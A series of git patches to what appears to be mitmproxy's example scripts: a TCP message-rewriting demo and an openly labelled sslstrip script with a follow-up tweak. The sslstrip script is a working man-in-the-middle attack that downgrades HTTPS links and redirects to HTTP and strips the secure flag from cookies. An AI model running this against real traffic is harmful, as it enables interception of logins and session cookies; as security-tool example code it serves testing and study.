From e766838a1a6bbb0b2290a3986ba8ae71c736f6f6 Mon Sep 17 00:00:00 2001
From: "Michael J. Bazzinotti" <mbazzinotti@gmail.com>
Date: Sat, 2 Jan 2016 10:00:27 -0500
Subject: Add Inline Script Hooks to TCP mode

---
 examples/tcp_message.py | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 examples/tcp_message.py

(limited to 'examples')

diff --git a/examples/tcp_message.py b/examples/tcp_message.py
new file mode 100644
index 00000000..c63368e4
--- /dev/null
+++ b/examples/tcp_message.py
@@ -0,0 +1,24 @@
+'''
+tcp_message Inline Script Hook API Demonstration
+------------------------------------------------
+
+* modifies packets containing "foo" to "bar"
+* prints various details for each packet.
+
+example cmdline invocation:
+mitmdump -T --host --tcp ".*" -q -s examples/tcp_message.py
+'''
+from netlib.utils import clean_bin
+
+def tcp_message(ctx, tcp_msg):
+    modified_msg = tcp_msg.message.replace("foo", "bar")
+
+    is_modified = False if modified_msg == tcp_msg.message else True
+    tcp_msg.message = modified_msg
+
+    print("[tcp_message{}] from {} {} to {} {}:\r\n{}".format(
+        " (modified)" if is_modified else "",
+        "client" if tcp_msg.sender == tcp_msg.client_conn else "server",
+        tcp_msg.sender.address,
+        "server" if tcp_msg.receiver == tcp_msg.server_conn else "client",
+        tcp_msg.receiver.address, clean_bin(tcp_msg.message)))
-- 
cgit v1.2.3


From 25705af76d72899140ec43e224aa2636e6a2d8f1 Mon Sep 17 00:00:00 2001
From: Niko Kommenda <nkommenda@hotmail.com>
Date: Tue, 12 Jan 2016 16:41:41 +0000
Subject: added sslstrip to inline script examples

---
 examples/sslstrip.py | 41 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 examples/sslstrip.py

(limited to 'examples')

diff --git a/examples/sslstrip.py b/examples/sslstrip.py
new file mode 100644
index 00000000..263ac1c1
--- /dev/null
+++ b/examples/sslstrip.py
@@ -0,0 +1,41 @@
+from netlib.http import decoded
+import re
+from six.moves import urllib
+
+def start(context, argv) :
+
+    #set of SSL/TLS capable hosts
+    context.secure_hosts = set()
+
+def request(context, flow) :
+
+    flow.request.headers.pop('Accept-Encoding', None)
+    flow.request.headers.pop('If-Modified-Since', None)
+    flow.request.headers.pop('Cache-Control', None)
+
+    #proxy connections to SSL-enabled hosts
+    if flow.request.pretty_host in context.secure_hosts :
+        flow.request.scheme = 'https'
+        flow.request.port = 443
+
+def response(context, flow) :
+
+    with decoded(flow.response) :
+        flow.request.headers.pop('Strict-Transport-Security', None)
+        flow.request.headers.pop('Public-Key-Pins', None)
+
+        #strip links in response body
+        flow.response.content = flow.response.content.replace('https://', 'http://')
+
+        #strip links in 'Location' header
+        if flow.response.headers.get('Location','').startswith('https://'):
+            location = flow.response.headers['Location']
+            hostname = urllib.parse.urlparse(location).hostname
+            if hostname:
+                context.secure_hosts.add(hostname)
+            flow.response.headers['Location'] = location.replace('https://', 'http://', 1)
+
+        #strip secure flag from 'Set-Cookie' headers
+        cookies = flow.response.headers.get_all('Set-Cookie')
+        cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
+        flow.response.headers.set_all('Set-Cookie', cookies)
-- 
cgit v1.2.3


From 55e89865ff4f87f4c8ad16070a6c2177fcf6fac9 Mon Sep 17 00:00:00 2001
From: Niko Kommenda <nkommenda@hotmail.com>
Date: Tue, 12 Jan 2016 22:25:42 +0000
Subject: no longer strips Accept-Encoding as mitmproxy can handle compression

---
 examples/sslstrip.py | 1 -
 1 file changed, 1 deletion(-)

(limited to 'examples')

diff --git a/examples/sslstrip.py b/examples/sslstrip.py
index 263ac1c1..369427a2 100644
--- a/examples/sslstrip.py
+++ b/examples/sslstrip.py
@@ -9,7 +9,6 @@ def start(context, argv) :
 
 def request(context, flow) :
 
-    flow.request.headers.pop('Accept-Encoding', None)
     flow.request.headers.pop('If-Modified-Since', None)
     flow.request.headers.pop('Cache-Control', None)
 
-- 
cgit v1.2.3